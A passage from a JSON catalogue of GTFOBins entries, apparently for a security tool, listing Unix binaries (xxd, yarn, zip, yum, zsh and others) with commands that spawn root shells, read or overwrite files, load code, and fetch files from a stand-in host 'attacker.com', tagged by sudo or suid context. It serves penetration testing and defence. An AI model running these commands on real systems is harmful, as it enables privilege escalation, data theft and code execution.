installation","aliases":[]},{"id":"gtfo:xmodmap:file-read:0:unprivileged","toolId":"gtfo:xmodmap","toolName":"xmodmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xmodmap -v /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xmodmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xmore:file-read:0:sudo","toolId":"gtfo:xmore","toolName":"xmore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmore /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xmore/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xmore:file-read:0:suid","toolId":"gtfo:xmore","toolName":"xmore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmore /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xmore/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xmore:file-read:0:unprivileged","toolId":"gtfo:xmore","toolName":"xmore","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xmore /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xmore/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xpad:file-read:0:sudo","toolId":"gtfo:xpad","toolName":"xpad","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xpad -f /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xpad/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xpad:file-read:0:suid","toolId":"gtfo:xpad","toolName":"xpad","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xpad -f /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xpad/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xpad:file-read:0:unprivileged","toolId":"gtfo:xpad","toolName":"xpad","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xpad -f /path/to/input-file","description":"The file is displayed in a graphical window.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xpad/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xxd:file-read:0:sudo","toolId":"gtfo:xxd","toolName":"xxd","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xxd /path/to/input-file | xxd -r","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xxd:file-read:0:suid","toolId":"gtfo:xxd","toolName":"xxd","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xxd /path/to/input-file | xxd -r","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xxd:file-read:0:unprivileged","toolId":"gtfo:xxd","toolName":"xxd","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xxd /path/to/input-file | xxd -r","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xxd:file-write:0:sudo","toolId":"gtfo:xxd","toolName":"xxd","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | xxd | xxd -r - /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xxd:file-write:0:suid","toolId":"gtfo:xxd","toolName":"xxd","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | xxd | xxd -r - /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xxd:file-write:0:unprivileged","toolId":"gtfo:xxd","toolName":"xxd","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | xxd | xxd -r - /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xz:file-read:0:sudo","toolId":"gtfo:xz","toolName":"xz","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xz -c /path/to/input-file | xz -d","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xz/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xz:file-read:0:suid","toolId":"gtfo:xz","toolName":"xz","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xz -c /path/to/input-file | xz -d","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xz/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xz:file-read:0:unprivileged","toolId":"gtfo:xz","toolName":"xz","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xz -c /path/to/input-file | xz -d","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xz/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yarn:shell:0:sudo","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yarn exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yarn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yarn:shell:0:unprivileged","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"yarn exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yarn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yarn:shell:1:sudo","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nyarn --cwd .","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yarn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yarn:shell:1:unprivileged","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nyarn --cwd .","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yarn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yarn:shell:2:sudo","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nyarn --cwd . xxx","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yarn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yarn:shell:2:unprivileged","toolId":"gtfo:yarn","toolName":"yarn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nyarn --cwd . xxx","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yarn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yash:shell:0:sudo","toolId":"gtfo:yash","toolName":"yash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yash:shell:0:suid","toolId":"gtfo:yash","toolName":"yash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yash","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/yash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yash:shell:0:unprivileged","toolId":"gtfo:yash","toolName":"yash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"yash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yelp:file-read:0:sudo","toolId":"gtfo:yelp","toolName":"yelp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"yelp man:/path/to/input-file","description":"This spawns a graphical window containing the file content somehow corrupted by word wrapping.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yelp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yelp:file-read:0:unprivileged","toolId":"gtfo:yelp","toolName":"yelp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"yelp man:/path/to/input-file","description":"This spawns a graphical window containing the file content somehow corrupted by word wrapping.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yelp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yt-dlp:shell:0:sudo","toolId":"gtfo:yt-dlp","toolName":"yt-dlp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"yt-dlp 'https://www.youtube.com/watch?v=xxxxxxxxxxx' --exec '/bin/sh #'","description":"The URL must point to a valid YouTube video which will be actually downloaded.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yt-dlp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yt-dlp:shell:0:unprivileged","toolId":"gtfo:yt-dlp","toolName":"yt-dlp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"yt-dlp 'https://www.youtube.com/watch?v=xxxxxxxxxxx' --exec '/bin/sh #'","description":"The URL must point to a valid YouTube video which will be actually downloaded.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/yt-dlp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yum:command:0:sudo","toolId":"gtfo:yum","toolName":"yum","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"yum localinstall -y x-1.0-1.noarch.rpm","description":"Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t rpm -a all --before-install .x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yum/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yum:download:0:sudo","toolId":"gtfo:yum","toolName":"yum","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"yum install http://attacker.com/path/to/input-file.rpm","description":"The file on the remote host must have the `.rpm` extension, but the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in `/var/tmp/yum-root-xxxxxx/`.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yum/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:yum:inherit:0:sudo","toolId":"gtfo:yum","toolName":"yum","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"cat >/path/to/temp-dir/x<<EOF\n[main]\nplugins=1\npluginpath=/path/to/temp-dir/\npluginconfpath=/path/to/temp-dir/\nEOF\n\ncat >/path/to/temp-dir/y.conf<<EOF\n[main]\nenabled=1\nEOF\n\ncat >/path/to/temp-dir/y.py<<EOF\nimport yum\nfrom yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE\nrequires_api_version='2.1'\ndef init_hook(conduit):\n ...\nEOF\n\nyum -c /path/to/temp-dir/x --enableplugin=y","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/yum/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zathura:shell:0:sudo","toolId":"gtfo:zathura","toolName":"zathura","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zathura\n:! /bin/sh -c 'exec /bin/sh 0<&1'","description":"The interaction happens in a GUI window, while the shell is dropped in the terminal.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zathura/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zathura:shell:0:unprivileged","toolId":"gtfo:zathura","toolName":"zathura","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"zathura\n:! /bin/sh -c 'exec /bin/sh 0<&1'","description":"The interaction happens in a GUI window, while the shell is dropped in the terminal.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zathura/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zcat:file-read:0:sudo","toolId":"gtfo:zcat","toolName":"zcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zcat -f /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zcat:file-read:0:unprivileged","toolId":"gtfo:zcat","toolName":"zcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zcat -f /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zgrep:file-read:0:sudo","toolId":"gtfo:zgrep","toolName":"zgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zgrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zgrep:file-read:0:unprivileged","toolId":"gtfo:zgrep","toolName":"zgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zgrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zic:command:0:sudo","toolId":"gtfo:zic","toolName":"zic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'Rule Jordan 0 1 xxx Jan lastSun 2 1:00d -' >/path/to/temp-file\necho 'Zone Test 2:00 Jordan CE%sT' >>/path/to/temp-file\nzic -d . -y /path/to/command /path/to/temp-file","description":"This executes the command twice:\n\n- `/path/to/command 0 xxx`\n- `/path/to/command 1 xxx`\n\nAdditionally the `Test` file is created.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zic:command:0:suid","toolId":"gtfo:zic","toolName":"zic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'Rule Jordan 0 1 xxx Jan lastSun 2 1:00d -' >/path/to/temp-file\necho 'Zone Test 2:00 Jordan CE%sT' >>/path/to/temp-file\nzic -d . -y /path/to/command /path/to/temp-file","description":"This executes the command twice:\n\n- `/path/to/command 0 xxx`\n- `/path/to/command 1 xxx`\n\nAdditionally the `Test` file is created.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zic:command:0:unprivileged","toolId":"gtfo:zic","toolName":"zic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo 'Rule Jordan 0 1 xxx Jan lastSun 2 1:00d -' >/path/to/temp-file\necho 'Zone Test 2:00 Jordan CE%sT' >>/path/to/temp-file\nzic -d . -y /path/to/command /path/to/temp-file","description":"This executes the command twice:\n\n- `/path/to/command 0 xxx`\n- `/path/to/command 1 xxx`\n\nAdditionally the `Test` file is created.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zip:file-read:0:sudo","toolId":"gtfo:zip","toolName":"zip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zip /path/to/temp-file /path/to/input-file\nunzip -p /path/to/temp-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zip:file-read:0:suid","toolId":"gtfo:zip","toolName":"zip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zip /path/to/temp-file /path/to/input-file\nunzip -p /path/to/temp-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zip:file-read:0:unprivileged","toolId":"gtfo:zip","toolName":"zip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zip /path/to/temp-file /path/to/input-file\nunzip -p /path/to/temp-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zip:shell:0:sudo","toolId":"gtfo:zip","toolName":"zip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zip /path/to/temp-file /etc/hosts -T -TT '/bin/sh #'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zip:shell:0:suid","toolId":"gtfo:zip","toolName":"zip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zip /path/to/temp-file /etc/hosts -T -TT '/bin/sh #'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zip:shell:0:unprivileged","toolId":"gtfo:zip","toolName":"zip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"zip /path/to/temp-file /etc/hosts -T -TT '/bin/sh #'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zless:inherit:0:sudo","toolId":"gtfo:zless","toolName":"zless","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zless /path/to/input-file","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zless/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zless:inherit:0:suid","toolId":"gtfo:zless","toolName":"zless","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zless /path/to/input-file","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zless/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zless:inherit:0:unprivileged","toolId":"gtfo:zless","toolName":"zless","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"zless /path/to/input-file","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zless/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:download:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(<&$REPLY)\" >/path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:download:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(<&$REPLY)\" 